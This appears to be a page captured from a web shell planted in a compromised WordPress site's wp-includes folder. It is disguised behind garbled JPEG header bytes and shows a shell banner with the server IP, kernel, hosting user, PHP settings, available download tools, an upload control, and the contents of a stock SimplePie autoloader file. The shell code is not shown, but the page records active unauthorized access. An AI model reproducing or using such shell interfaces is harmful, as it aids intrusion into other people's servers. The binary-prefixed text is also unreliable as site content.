????JFIF??H?H????Exif??MM?*???? ??3????V?????3??????3?(????????????????????3?????
Server IP : 104.21.92.120 / Your IP : 3.129.253.21 Web Server : LiteSpeed System : Linux fr-int-web1270.main-hosting.eu 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : u217304719 ( 217304719) PHP Version : 8.1.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u217304719/domains/erekafleuriste.com/public_html/wp-includes/ |
Upload File : |
<?php if ( class_exists( 'SimplePie', false ) ) { return; } // Load and register the SimplePie native autoloaders. require ABSPATH . WPINC . '/SimplePie/autoloader.php'; /** * WordPress autoloader for SimplePie. * * @since 3.5.0 * @deprecated 6.7.0 Use `SimplePie_Autoloader` instead. * * @param string $class Class name. */ function wp_simplepie_autoload( $class ) { _deprecated_function( __FUNCTION__, '6.7.0', 'SimplePie_Autoloader' ); }